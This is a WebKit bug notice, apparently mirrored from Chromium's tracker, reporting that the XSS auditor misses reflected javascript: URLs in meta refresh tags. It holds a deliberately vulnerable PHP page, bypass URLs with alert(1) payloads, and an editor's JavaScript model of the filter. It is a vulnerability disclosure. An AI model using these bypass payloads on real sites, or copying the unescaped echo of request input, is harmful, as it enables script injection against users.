[Webkit-unassigned] [Bug 67091] New: XSS auditor bypass with http-equiv="refresh"

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Sat Aug 27 13:30:16 PDT 2011


https://bugs.webkit.org/show_bug.cgi?id=67091

           Summary: XSS auditor bypass with http-equiv="refresh"
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: Unspecified
        OS/Version: Unspecified
            Status: NEW
          Severity: Normal
          Priority: P2
         Component: WebKit Misc.
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: abarth at webkit.org
                CC: dbates at webkit.org
            Blocks: 66579


http://code.google.com/p/chromium/issues/detail?id=94482


Reported by j.terh... at gmail.com, Today (4 hours ago)
VULNERABILITY DETAILS
A basic reflected XSS, using the <meta http-equiv="refresh" /> vector, is allowed by the XSS filter.

VERSION
Chrome Version: 13.0.782.215 m + stable
Operating System: Windows NT 5.1 build 2600 (Windows XP Home Edition Service Pack 3) i586

REPRODUCTION CASE
Place the attached PHP file in a web-accessible directory of a PHP-enabled Apache server at http://<host>/xss.php and call:
http://<host>/xss.php?refresh=javascript:alert(1)

The alert is shown and no blocking message is posted to the console. However the call:
http://<host>/xss.php?body=%3Cscript%3Ealert(1)%3C/script%3E 

_is_ blocked and the usual blocking message ("Refused to execute a JavaScript script. Source code of script found within request.") is posted to the console. See screenshots refresh.jpg and basic.jpg.

ADDITIONAL:
If line 4 of the php script is changed to:
echo "<meta http-equiv='refresh' content='0; url=javascript:{$_GET['refresh']}' />";

the filter will also miss the reflected XSS if called as follows: 
http://<host>/xss.php?refresh=alert(1)

Also if line 4 is changed to:
echo "<meta http-equiv='refresh' {$_GET['refresh']} />";

and called using:
http://<host>/xss.php?refresh=content=%220;%20url=javascript:alert(1)%22

the XSS is also allowed. _However_ if line 4 is changed to:
echo "<meta {$_GET['refresh']} />";

and the call:
http://<host>/xss.php?refresh=http-equiv=%22refresh%22%20content=%220;%20url=javascript:alert(1)%22

is made, the filter WILL detect the XSS (see screenshot refresh2.jpg).

PHP Version: 5.3.5
Apache: Apache/2.2.17 (Win32) compiled with MSVC6


<html>
<?php
        if( isset($_GET['refresh']) ) {   // 'refresh' is reflected unescaped into a <meta http-equiv='refresh'> tag
                //echo "<meta http-equiv='refresh' content='0; url={$_GET['refresh']}' />";              // variant used with ?refresh=javascript:alert(1)
                echo "<meta http-equiv='refresh' {$_GET['refresh']} />";                             // variant used with ?refresh=content="0; url=javascript:alert(1)"
                //echo "<meta http-equiv='refresh' content='0; url=javascript:{$_GET['refresh']}' />"; // variant used with ?refresh=alert(1)
        }
?>
<body>
<?php
        if( isset($_GET['body']) ) {   // 'body' is reflected unescaped into the document; a <script> here is caught by the filter
                echo $_GET['body'];
        }
?>
</body>
</html>

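Added illustration (editor's example, not WebKit's XSS auditor and not the reporter's code). It models the HTML "shared declarative refresh steps" that browsers use to read a <meta http-equiv="refresh"> content attribute, renders the report's three PHP echo variants as JavaScript template strings, and runs two simplified filters over the result: a "naive" one that only compares <script> bodies and src/href/on* attribute values against the decoded request (a stand-in for the "source code of script found within request" heuristic, not the auditor's real algorithm), and a refresh-aware one that additionally parses the refresh content and flags a javascript: target whose script body appears in the request. DOC_URL is a placeholder page URL, the request URLs are constructed from the report's reproduction steps, and the tag/attribute regexes are deliberately minimal.

```javascript
// Editor's example, not WebKit code: why a request-reflection filter that never
// parses <meta http-equiv="refresh"> misses the report's three payloads.
const DOC_URL = 'http://example.invalid/xss.php'; // assumed placeholder page URL

// Parse a refresh content value following the HTML spec's declarative refresh
// steps (leading digits, optional ';' or ',', optional case-insensitive "url=",
// optional quotes). Returns { time, url: URL } or null when the value is not a
// valid refresh declaration.
function parseMetaRefresh(content, base = DOC_URL) {
  const s = String(content);
  let p = 0;
  const ws = c => c !== undefined && '\t\n\f\r '.includes(c);
  const skipWs = () => { while (ws(s[p])) p++; };
  const optional = chars => (s[p] !== undefined && chars.includes(s[p]) ? (p++, true) : false);

  skipWs();
  let digits = '';
  while (s[p] !== undefined && s[p] >= '0' && s[p] <= '9') digits += s[p++];
  if (digits === '' && s[p] !== '.') return null;
  const time = digits === '' ? 0 : parseInt(digits, 10);
  while (s[p] !== undefined && ((s[p] >= '0' && s[p] <= '9') || s[p] === '.')) p++;
  if (p >= s.length) return { time, url: new URL(base) };   // "5" alone means reload
  if (!';,'.includes(s[p]) && !ws(s[p])) return null;
  skipWs();
  if (s[p] === ';' || s[p] === ',') p++;
  skipWs();
  // A partial "url=" prefix advances past whatever matched, as the spec's
  // "jump to skip quotes" does.
  if (optional('Uu') && optional('Rr') && optional('Ll')) {
    skipWs();
    if (optional('=')) skipWs();
  }
  let quote = '';
  if (s[p] === "'" || s[p] === '"') quote = s[p++];
  let urlString = s.slice(p);
  if (quote && urlString.includes(quote)) urlString = urlString.slice(0, urlString.indexOf(quote));
  try { return { time, url: new URL(urlString, base) }; } catch { return null; }
}

// Minimal attribute scanner for a tag's attribute text (constructed inputs only).
function attrs(text) {
  const out = [];
  for (const m of text.matchAll(/([^\s=\/"'>]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g))
    out.push({ name: m[1].toLowerCase(), value: m[2] ?? m[3] ?? m[4] });
  return out;
}

// The three echo variants from the report, reproduced as templates.
const TEMPLATES = {
  url:   r => `<meta http-equiv='refresh' content='0; url=${r}' />`,
  jsurl: r => `<meta http-equiv='refresh' content='0; url=javascript:${r}' />`,
  attrs: r => `<meta http-equiv='refresh' ${r} />`,
};

// Render xss.php for a request: 'refresh' goes into the meta tag, 'body' into <body>.
function render(requestUrl, template) {
  const q = new URL(requestUrl).searchParams;
  let html = '<html>';
  if (q.get('refresh') !== null) html += TEMPLATES[template](q.get('refresh'));
  html += '<body>';
  if (q.get('body') !== null) html += q.get('body');
  return html + '</body></html>';
}

const decodedQuery = requestUrl => decodeURIComponent(new URL(requestUrl).search);

// Naive model: only <script> bodies and src/href/on* attribute values are
// compared against the decoded request.
function naiveFilter(html, requestUrl) {
  const req = decodedQuery(requestUrl);
  const inReq = v => v.length > 0 && req.includes(v);
  for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) if (inReq(m[1])) return true;
  for (const t of html.matchAll(/<(\w+)\b([^>]*)>/g))
    for (const a of attrs(t[2]))
      if ((a.name === 'src' || a.name === 'href' || a.name.startsWith('on')) && inReq(a.value)) return true;
  return false;
}

// Refresh-aware model: also parse meta refresh and flag a javascript: target
// whose script body (the URL's opaque path) is present in the request.
function refreshAwareFilter(html, requestUrl) {
  if (naiveFilter(html, requestUrl)) return true;
  const req = decodedQuery(requestUrl);
  for (const t of html.matchAll(/<meta\b([^>]*)>/gi)) {
    const a = Object.fromEntries(attrs(t[1]).map(x => [x.name, x.value]));
    if ((a['http-equiv'] ?? '').trim().toLowerCase() !== 'refresh' || a.content === undefined) continue;
    const parsed = parseMetaRefresh(a.content);
    if (parsed && parsed.url.protocol === 'javascript:' && req.includes(parsed.url.pathname)) return true;
  }
  return false;
}

// Constructed from the report's reproduction URLs; the last one is the <script>
// case the filter does block.
const CASES = [
  { template: 'url',   request: `${DOC_URL}?refresh=javascript:alert(1)` },
  { template: 'jsurl', request: `${DOC_URL}?refresh=alert(1)` },
  { template: 'attrs', request: `${DOC_URL}?refresh=content=%220;%20url=javascript:alert(1)%22` },
  { template: 'url',   request: `${DOC_URL}?body=%3Cscript%3Ealert(1)%3C/script%3E` },
];

function evaluate() {
  return CASES.map(c => {
    const html = render(c.request, c.template);
    return { html, naive: naiveFilter(html, c.request), refreshAware: refreshAwareFilter(html, c.request) };
  });
}

for (const r of evaluate()) console.log(r.naive, r.refreshAware, r.html);
```

The naive model flags only the fourth case, the refresh-aware one flags all four; the difference is entirely in whether the filter understands that a refresh declaration is a navigation to an attacker-chosen URL, so the content attribute deserves the same treatment as href or src.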